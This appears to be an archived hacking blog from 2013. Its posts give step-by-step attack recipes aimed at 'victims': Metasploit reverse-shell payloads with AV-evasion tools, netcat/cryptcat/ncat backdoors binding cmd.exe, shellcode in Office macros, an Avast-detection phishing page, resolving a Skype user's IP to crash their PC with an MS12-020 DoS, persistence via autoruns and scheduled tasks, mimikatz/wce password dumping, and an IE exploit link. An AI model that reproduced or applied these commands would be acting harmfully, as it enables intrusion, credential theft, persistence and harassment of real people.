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Wednesday, October 30, 2013

List of Differnet AV evasion Frameworks.

Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.


Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.

Click here for how to install & use Veil?

(2)AV0id :-

Anti-Virus Bypass Metasploit Payload Generator Script.

cd metasploitavevasion-master/

Antivirus Evasion

If you are using other interface than eth , then you have to change in script . For exmaple ; i am using ppp0 interface ,so open file & replace line 150 which is IP=$(ifconfig "$IPINT" |grep "inet adr:" |cut -d ":" -f 2 |awk '{ print $1 }') with IP=$(ifconfig ppp0 | awk '/inet addr/ {split ($2,A,":"); print A[2]}').


Click here for original author`s blog.


tar xf syringe\ 0.1.tar


As mention previously , change interface type in script if you are not using eth. Replace line 10 which is export interface=eth0 to export interface=ppp0.



git clone

we are gonna use downloaded shellcodexec in third step on victim machine.

(1)msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST= R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

(2)msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST= E

(3)C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>


Click here for detail tutorial on  how to use shellcodeexec?


Hyperion is a runtime encrypter for 32-bit portable executables.

cd Hyperion-1.0
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe

Now generate metasploit payload.


msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe >payload.exe
wine crypter.exe payload.exe encrypted_payload.exe



Download it from below link .

If you get error while running then change path of structure.c in line 45 & save it , run again.

(7)Brute-force AV Evasion :- is script to generate lots of payloads , then scan folder for specific after that you have some binary left in folder which does not detected by specific AV.

Click here for Original tutorial

python windows/meterpreter/reverse_tcp 443 1000 yes

(8)Finding Simple AV Signatures with PowerShell :-

Awesome tutorial here to find AV signatures & then change specific bit which trigger AV . It only works with signature-based antivirus .


Bypass AV using SET powershell module using Batch file

Get shell using powersploit

Deliver powershell payload using macro

(10)Get Shell Using VB script:-

Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well.

For details tutorial click here

(11)Ghost Writing ASM :-

Using Metasm To Avoid Antivirus Detection. First generate metasploit payload in raw format then disassmble using metasm which come with metasploit.Add anything you want so long as you don’t break the functionality of the application.After that compile into EXE.

For tutorial click here .

(12)Different Pivoting technique to bypass AV :-

Following are framework & module which are mostly used after getting credentials. It does not flag by AV like traditional psexec.




(4)PTH suite

(5)Metasploit module:- powershell_psexec , psexec_psh , psexec_command

If you know other methods for AV evasion then please comment here.

Thursday, October 24, 2013

Backdoor using Netcat, cryptcat , ncat.

Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command.

netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Attacker `s I.P :

Victim`s I.P.     :

We will talk about Netcat, cryptcat & ncat.


Netcat is used as backdoor. After gaining access to machine , we are creating "netcat" as startup service using changes to the system registry . And then we are gonna open port for communication. At attacker side just start  netcat listener. Here is tutorial on how to create netcat backdoor?

But if you know about method used in that tutorial ; there are some disadvantages of using netcat.

(1)Most of AV flag netcat as hacking tool :- I know You can use crypter , but still general behavior detection  possible by AV.


(2)Clear text communication (No encryption):-anyone from same network can view your communication.Also due to clear text communication firewall or AV can popup & block our communication.


(3)No authentication:- anyone can start listner to connect back to our backdoor , because there is no mechanism to verify that user are authorized or not.


Cryptcat is same as netcat but in advanced it provide encryption & authentication mechanism.

How to install cryptcat?

In case of backtrack , apt-get install cryptcat .

If you are in other linux OS , then you have to manually installed it from source ; because in repository it does not come with e option , so we can not bind any program to it.

So download source from here .

unzip it , change directory & enter following command

make unix

To make exe(windows compatible) from source , use visual studio.

root@bt:~# cryptcat -h
connect to somewhere:    nc [-options] hostname port[s] [ports] ...
listen for inbound:            nc -l -p port [-options] [hostname] [port]
    -e prog            program to exec after connect [dangerous!!]
    -g gateway      source-routing hop point[s], up to 8
    -G num            source-routing pointer: 4, 8, 12, ...
    -h                     this cruft
    -k secret          set the shared secret
    -i secs              delay interval for lines sent, ports scanned
    -l                      listen mode, for inbound connects
    -n                     numeric-only IP addresses, no DNS
    -o file               hex dump of traffic
    -p port             local port number
    -r                     randomize local and remote ports
    -s addr             local source address
    -u                     UDP mode
    -v                     verbose [use twice to be more verbose]
    -w secs            timeout for connects and final net reads
    -z                     zero-I/O mode [used for scanning]

Most of options are same as netcat, but look at new option as -k , it provide password for communication.

On victim machine type following command

cryptcat -Ldp 455 -e cmd.exe

On attacker side , setup listner

cryptcat 455


Look at following figure ; where we capture traffic using wireshark ; it`s encrypted.


You can also provide -k option for authentication.So in case of cryptcat we got authentication & encryption.

But still it detected by AV.

cryptcat virustotal
                                            Virustotal link


Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat.Ncat  come with nmap , so in attacker side we have already installed ncat. 

To download ncat for windwos click here.

View man page of ncat or ncat --help ; it has so many option.

For encryption & authentication you can use ssl ,ssl cert, ssl key ,ssl verify.

on victim side:-

ncat -lvp 455 --ssl -e cmd.exe --allow

I encrypt communication using ssl & only allow ip to connect back.It`s possible to connect back using spoofing I.P.

on attacker side

ncat 445 --ssl


And it does not detected by AV.

cryptcat virustotal

So with help of ncat , we can get around of our problems which are no-authentication, no-encryption, caught by AV.

Friday, October 18, 2013

Get shell Using Shellcode in Macro.

We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.

use payload/windows/meterpreter/reverse_tcp
set LPORT 443
generate -t vba

Now we have generated our shellcode. Now we will create macro.

(1)Open any word or Excell document

(2)Click on view & then click on Macros.

(3)Give name to macro & create macro.

(4)Remove all things from modules windows & Paste our generated VB code.

(5)Saved it as type Word Macro-Enabled Document.

Send this file to victim. By default in MS Office  " Disable all macros with notification " option is enabled , so whenever any document try to execute Macro it will pop up security warning that macro is disable ; so to execute our shellcode using macro victim should click on Enable content.

You have to setup listener to listen reverse connection. If your IP is not available when victim open Document then document will be crash.So now we will setup listener

use exploit/multi/handler
set lhost
set lport 443
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe

Here we setup migrate script as autorunscript so when document will closed our shell will not die.

Monday, October 14, 2013

How to detect Avast Antivirus remotely?

During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?

Original video is posted here. In avast their is feature of site blocking ; so if you want to block any site you can put its address in block url section of avast interface.when someone load that site they get response as shown in below image.


In above image you can see that avast logo which address is localhost:12080/$$avast-webshield$$/image001.png . So if in client machine avast is installed than that image is also located at that address , by examine image is exist or not we can know that whether avast is installed or not.

For this purpose victim should visit  our link where we can check about image.So i am gonna use my apache server ; where i put three html page. One is our link which we gonna send to victim ; if image exist it redirect to other document ; & if image does not exist it redirect to third html page.

(1)Make blank html page & give it to name avst.html & put following code in that html page.

<meta http-equiv="refresh" content="0; url=">

(2)Now make second html page & give it to name ntavst.html & put same code in that page.

<meta http-equiv="refresh" content="0; url=">

(3)Make third & final html page and give it to name exp.html & put following code.

<div dir="ltr" style="text-align: left;" trbidi="on">

<img src="$$avast-webshield$$"/image001.png" onload="document.location=''" onerror="document.location=''" />

Note:- Change your i.p in above code.

Now put these all document in /var/www/ folder.And send link of exp.html to victim

So if avast installed then it redirect to avast.html page & finally redirect to & if it does not installed then it will redirect to ntavst.html page & then redirect to

Now check your apache log file from \var\log\apache2\log ; you can check if avst.html page has been visited or ntavst.html page.

PS: You can use cobalt strike `s system profiler which get you os version;  browser detail; java version ; adobe reader  version & flash version.

Friday, October 11, 2013

Fun with skype resolver

Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.

If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P.

netstat -tupan | grep skype > n1

Now chat with your victim; as soon as you got reply use following command.

netstat -tupan | grep skype > n2

diff n1 n2

Now we have I.P. of victim.

In most situation our victim is not in our friend-list. So for that situation, we will going to use online skype resolver.

Use one of following  links to get I.P. of your victim using his skype user-name.






Okay we got I.P. Now you can directly DOS or DDOS( ddos and dos attacks are illegal) them . But we are going to use different technique to shutdown your victim pc using RDP.

First scan ip to find open ports of victim.

root@bt:~# nmap

Starting Nmap 6.40 ( ) at 2013-10-11 18:41 IST
Nmap scan report for
Host is up (0.00077s latency).
Not shown: 995 filtered ports
139/tcp     open   netbios-ssn
445/tcp     open   microsoft-ds
2869/tcp   closed icslap
3389/tcp   open   ms-wbt-server
10243/tcp closed unknown
MAC Address: 08:00:27:B3:A3:80 (Cadmus Computer Systems)


From result we can see that port 3389 is open which is used for RDP.

Now we will use metasploit Auxiliary module to check vulnerability.

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS
msf auxiliary(ms12_020_check) > run

[+] Vulnerable to MS12-020
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Okay we got that host is vulnerable to MS12-020.Now we will use metasploit module to Dos that I.p.

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST
msf auxiliary(ms12_020_maxchannelids) > run

[*] - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] - 210 bytes sent
[*] - Checking RDP status...
[+] seems down
[*] Auxiliary module execution completed


And bingo ; your victim machine should be restarted. :)

Monday, October 7, 2013

Get shell using Missing Autoruns.

In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.

(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will run in background.When uninstallation of program is not completed ; then it fails to remove its value from registry. So it`s called Missing Autoruns.

After compromised pc ; we have to find missing autoruns in victim machine.For this purpose we will use sysinternal `s autorunsc.exe.

(1)Get meterpreter shell.

(2)Upload sysinternal`s autoruns.exe & autorun.exe to victim machine.

(3)Now from uploaded directory execute following command to get missing autoruns of machine

autorunsc.exe -a | findstr /n /R "File\ not\ found"

(4)Now we have list of file which is missing ; these files are run at startup time.


(5)In my case you can see that uTorrent.exe is missing .

(6)So now i rename my backdoor to uTorrent .exe & uploaded to the path where it`s not found.


Now whenever machine is restarted you get shell.(Don`t forget to running multi/handler!!!)

For just POC ; you can run autorunsc.exe again to find out whether  our backdoor (uTorrent.exe) is written successfully or not?

missing -autorun-backdoor

In above image you can see that  uTorrent.exe is no longer missing which missed in previous step.

(B)Now this is second method; but may be suspicious.

When you put binary in start up folder it will run automatically when pc is started.

Startup Folder Location in windows Xp:-

C:\Documents and Settings\"nirav"\Start Menu\Programs\Startup

Startup Folder location In windows 7:-

C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

So upload your binary to start up folder ;make it hidden using following command.
attrb +h backdoor.exe
Restart machine & Hopefully you will get shell.

Friday, October 4, 2013

Schedule Task in windows after Exploitation.

Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here.

After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.

First create one batch file , put following code in it

@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"

Then upload your backdoor & created batch file.Please adjust path of batch file according to your upload path of backdoor.

Get clear text password:-

Following are different methods to get clear text password of windows.

(1)using mimikatz or wce get clear text password of victim.

(2) You can also use mimikatz password dump method .

(3)You can also use mimikatz meterpreter plugin which i used in this tutorial.

   meterpreter > load mimikatz
   meterpreter > help mimikatz
   meterpreter > kerberos
   meterpreter > mimikatz_command -h
   meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

(4)You can use wce & mimikatz in memory without uploading binary.

(a)WCE in memory:-

cd %systemroot%
cd system32
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt

(b)Mimikatz in memory:-

cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

So till now i upload one batch file ; backdoor & get clear text password.

Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit here . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed & i will get shell.

C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00

It will ask to enter password which we got before.


You can also use different option like ONIDLE, ONLOGON, and ONSTART & execute different binary according to your need.

Tuesday, October 1, 2013

Exploit For All IE version(CVE-2013-3893).

Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded here.

This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well.

For more technical Detail view metasploit blog here

The Metasploit module currently can be only tested on Internet Explorer 9 on Windows 7 SP1 with either Office 2007 or Office 2010 installed,

msf > use exploit/windows/browser/ie_setmousecapture_uaf
msf exploit(ie_setmousecapture_uaf) > set srvhost
srvhost =>
msf exploit(ie_setmousecapture_uaf) > set uripath /
uripath => /
msf exploit(ie_setmousecapture_uaf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_setmousecapture_uaf) > set lhost
lhost =>
msf exploit(ie_setmousecapture_uaf) > set lport 443
lport => 443
msf exploit(ie_setmousecapture_uaf) > run
[*] Exploit running as background job.
[*] Started reverse handler on
[*] Using URL:
[*] Server started.

Send this link to victim. As soon as he open link you will get meterpreter shell.
